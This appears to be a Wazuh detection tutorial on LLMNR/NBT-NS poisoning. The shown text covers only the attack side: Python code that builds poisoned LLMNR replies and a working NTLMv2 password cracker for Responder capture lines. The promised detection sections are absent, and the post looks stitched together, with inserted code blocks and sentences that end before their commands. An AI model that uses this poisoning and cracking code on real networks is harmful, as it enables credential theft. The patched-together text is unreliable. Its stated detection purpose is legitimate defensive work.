This type of attack captures credentials from unsuspecting users: the attacker runs, on the local network, a service that answers name-resolution requests for resources that do not exist, requests that are usually caused by typos or by misconfigurations (a mapped drive that still points at a decommissioned host, for example). When DNS cannot resolve the name, the victim host falls back to LLMNR or NBT-NS, the attacker answers, and the victim authenticates to the attacker's machine, handing over its NTLM response.


We will demonstrate two ways to detect "LLMNR Poisoning" attacks with Wazuh, depending on whether or not command execution is permitted on the agent.

The following tools were used for testing:

  • Responder to carry out the attack and Hashcat to crack the captured hashes.
  • Wazuh 4.3.1 (or higher) for event detection.
  • PowerShell and Windows Task Scheduler.


Introduction

The following MITRE ATT&CK sub-technique will be analyzed:

           T1557.001 - LLMNR/NBT-NS Poisoning and SMB Relay


Within the MITRE ATT&CK matrix, the parent technique is T1557 (Adversary-in-the-Middle):


Sub-technique T1557.001 reads:

"By responding to LLMNR (UDP 5355)/NBT-NS (UDP 137) network traffic, adversaries may spoof an authoritative source for name resolution to force communication with an adversary-controlled system. This activity may be used to collect or relay authentication materials (...). In some cases where an adversary has access to a system that is in the authentication path between systems or when automated scans that use credentials attempt to authenticate to an adversary-controlled system, the NTLMv1/v2 hashes can be intercepted and relayed to access and execute code against a target system. Additionally, adversaries may encapsulate the NTLMv1/v2 hashes into various protocols, such as LDAP, SMB, MSSQL and HTTP, to expand and use multiple services with the valid NTLM response."


Attack preparation

We will use the Responder tool to test the sub-technique. Responder listens for LLMNR, NBT-NS and mDNS name-resolution requests and "poisons" them by answering every query with its own address, so the requesting host connects to, and authenticates against, the attacker's machine.
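To make the poisoning concrete, here is an added example (my own code, not part of the original post and not Responder's code) that builds the LLMNR query a Windows host multicasts to 224.0.0.252:5355 when DNS has no answer, the reply a poisoner sends back, and a check that flags any answer to a name we made up. The transaction id, the attacker address 192.0.2.66 and the "wazuh-" canary prefix are assumptions for illustration; the packet layout follows the DNS wire format that LLMNR reuses.

```python
"""LLMNR query / poisoned reply round trip (added example, not from the original post).

LLMNR reuses the DNS wire format over UDP 5355 (multicast 224.0.0.252). A
poisoner such as Responder does not care which name is asked for: it answers
every query with its own address. The constants and the canary prefix below
are assumptions made for this demo, not values taken from the post.
"""
import secrets
import struct

LLMNR_MCAST = "224.0.0.252"   # IPv4 multicast group used by LLMNR
LLMNR_PORT = 5355
QTYPE_A = 1
QCLASS_IN = 1


def encode_name(name: str) -> bytes:
    """Encode a host name as DNS labels: length byte + label, terminated by 0."""
    out = b""
    for label in name.rstrip(".").split("."):
        raw = label.encode("ascii")
        out += bytes([len(raw)]) + raw
    return out + b"\x00"


def decode_name(packet: bytes, offset: int):
    """Decode labels starting at offset (no compression pointers used here)."""
    labels = []
    while True:
        length = packet[offset]
        offset += 1
        if length == 0:
            break
        labels.append(packet[offset:offset + length].decode("ascii"))
        offset += length
    return ".".join(labels), offset


def build_llmnr_query(name: str, txid: int) -> bytes:
    """The query a Windows host multicasts when DNS has no answer for `name`."""
    header = struct.pack(">HHHHHH", txid, 0x0000, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack(">HH", QTYPE_A, QCLASS_IN)


def parse_llmnr(packet: bytes) -> dict:
    """Parse header, question and (if present) the first A answer."""
    txid, flags, _qd, an, _ns, _ar = struct.unpack(">HHHHHH", packet[:12])
    qname, off = decode_name(packet, 12)
    qtype, _qclass = struct.unpack(">HH", packet[off:off + 4])
    off += 4
    answer_ip = None
    if an:
        # Answer RR: name (repeated, as Responder does), type, class, TTL, rdlength, rdata
        _aname, off = decode_name(packet, off)
        atype, _aclass, _ttl, rdlen = struct.unpack(">HHIH", packet[off:off + 10])
        off += 10
        if atype == QTYPE_A and rdlen == 4:
            answer_ip = ".".join(str(b) for b in packet[off:off + 4])
    return {"txid": txid, "is_response": bool(flags & 0x8000),
            "qname": qname, "qtype": qtype, "answer_ip": answer_ip}


def build_poisoned_reply(query: bytes, attacker_ip: str) -> bytes:
    """What a poisoner returns: same txid, QR bit set, an A record pointing at itself."""
    q = parse_llmnr(query)
    header = struct.pack(">HHHHHH", q["txid"], 0x8000, 1, 1, 0, 0)
    question = encode_name(q["qname"]) + struct.pack(">HH", QTYPE_A, QCLASS_IN)
    rdata = bytes(int(o) for o in attacker_ip.split("."))
    answer = encode_name(q["qname"]) + struct.pack(">HHIH", QTYPE_A, QCLASS_IN, 30, 4) + rdata
    return header + question + answer


def canary_name() -> str:
    """A random name that no host on the LAN legitimately owns (assumed prefix)."""
    return "wazuh-" + secrets.token_hex(4)


def check_reply(query: bytes, reply: bytes):
    """Return the responder's IP if `reply` answers our canary query, else None.

    Nobody should ever answer a name that does not exist, so an answer that
    matches our transaction id and name betrays a poisoner on the segment.
    """
    q, r = parse_llmnr(query), parse_llmnr(reply)
    if r["is_response"] and r["txid"] == q["txid"] and r["qname"].lower() == q["qname"].lower():
        return r["answer_ip"]
    return None


if __name__ == "__main__":
    # Constructed exchange: the victim asks for a canary, the poisoner answers.
    name = canary_name()
    query = build_llmnr_query(name, txid=0x1234)
    reply = build_poisoned_reply(query, "192.0.2.66")   # attacker address (assumed)
    print(f"{name} -> {check_reply(query, reply)}")
```

Because Responder answers whatever name is asked for, a query for a random name that gets any answer at all is a reliable indicator of a poisoner, which is what makes the technique detectable from an endpoint without having to capture traffic.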


Captured credentials are written to Responder's logs directory and recorded in the SQLite database Responder.db:

Cracking

Once the hashes are captured, John the Ripper or Hashcat can crack them. We save the captured hash line to the file "ntlmv2.hash" and run Hashcat (NTLMv2 is hash mode 5600):
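To show what Hashcat is actually recomputing for each candidate password, here is an added example (my own code, not from the original post and not Hashcat's or Responder's implementation) that parses a line in the user::DOMAIN:challenge:NTProofStr:blob format Responder prints, derives NTOWFv2 and NTProofStr as MS-NLMP defines them, and runs a small wordlist against it. The user "jdoe", domain "CORP", server challenge, blob, password and wordlist are all constructed for the demo; MD4 is implemented inline because hashlib's md4 is frequently disabled by OpenSSL policy.

```python
"""What Hashcat mode 5600 computes for a Responder NTLMv2-SSP line.

Added example, not from the original post. Responder prints captured
credentials as user::DOMAIN:server_challenge:NTProofStr:blob and a cracker
recovers the password by recomputing NTProofStr for each candidate. The
capture below is constructed; MD4 is implemented here because hashlib's
md4 is often unavailable.
"""
import hashlib
import hmac
import struct

MASK = 0xFFFFFFFF


def _rotl(x: int, s: int) -> int:
    return ((x << s) | (x >> (32 - s))) & MASK


def _md4_block(state, block):
    X = struct.unpack("<16I", block)
    a, b, c, d = state
    for i in range(16):                                   # round 1: F = (b & c) | (~b & d)
        a = _rotl((a + ((b & c) | (~b & d)) + X[i]) & MASK, (3, 7, 11, 19)[i % 4])
        a, b, c, d = d, a, b, c
    for i in range(16):                                   # round 2: majority function
        k = (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15)[i]
        a = _rotl((a + ((b & c) | (b & d) | (c & d)) + X[k] + 0x5A827999) & MASK, (3, 5, 9, 13)[i % 4])
        a, b, c, d = d, a, b, c
    for i in range(16):                                   # round 3: xor
        k = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)[i]
        a = _rotl((a + (b ^ c ^ d) + X[k] + 0x6ED9EBA1) & MASK, (3, 9, 11, 15)[i % 4])
        a, b, c, d = d, a, b, c
    return tuple((s + v) & MASK for s, v in zip(state, (a, b, c, d)))


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320); the NT hash is MD4 of the UTF-16LE password."""
    state = (0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476)
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)
    for off in range(0, len(msg), 64):
        state = _md4_block(state, msg[off:off + 64])
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> bytes:
    return md4(password.encode("utf-16le"))


def ntlmv2_hash(password: str, user: str, domain: str) -> bytes:
    """NTOWFv2: HMAC-MD5 keyed with the NT hash over UPPER(user) + domain (UTF-16LE)."""
    return hmac.new(nt_hash(password), (user.upper() + domain).encode("utf-16le"), hashlib.md5).digest()


def nt_proof(password: str, user: str, domain: str, server_challenge: bytes, blob: bytes) -> bytes:
    """NTProofStr = HMAC-MD5(NTOWFv2, server_challenge || blob); this is what the line carries."""
    return hmac.new(ntlmv2_hash(password, user, domain), server_challenge + blob, hashlib.md5).digest()


def parse_responder_line(line: str) -> dict:
    """Split user::DOMAIN:challenge:NTProofStr:blob (Responder output, hashcat -m 5600)."""
    user, _, domain, challenge, proof, blob = line.strip().split(":")
    return {"user": user, "domain": domain, "challenge": bytes.fromhex(challenge),
            "proof": bytes.fromhex(proof), "blob": bytes.fromhex(blob)}


def crack(line: str, wordlist):
    """Return the first candidate whose recomputed NTProofStr matches, else None."""
    h = parse_responder_line(line)
    for candidate in wordlist:
        if nt_proof(candidate, h["user"], h["domain"], h["challenge"], h["blob"]) == h["proof"]:
            return candidate
    return None


# Constructed capture: what victim "jdoe" in domain "CORP" would send after being poisoned.
SERVER_CHALLENGE = bytes.fromhex("1122334455667788")
# NTLMv2 blob: version header, reserved, timestamp, client challenge, target info (illustrative bytes)
BLOB = bytes.fromhex("0101000000000000" + "00" * 8 + "aabbccddeeff0011" + "00000000" + "0000000000000000")
CAPTURED_PASSWORD = "Winter2023!"   # assumed for the demo


def sample_line() -> str:
    proof = nt_proof(CAPTURED_PASSWORD, "jdoe", "CORP", SERVER_CHALLENGE, BLOB)
    return f"jdoe::CORP:{SERVER_CHALLENGE.hex()}:{proof.hex()}:{BLOB.hex()}"


if __name__ == "__main__":
    wordlist = ["password", "Summer2023!", "Winter2023!", "letmein"]
    print(sample_line())
    print(crack(sample_line(), wordlist))
```

The server challenge and blob are sent in the clear, so the only unknown in NTProofStr is the NT hash; that is why a captured NTLMv2 response is offline-crackable at wordlist speed without any further interaction with the victim, and why the detection the following sections build matters even when SMB signing blocks relaying.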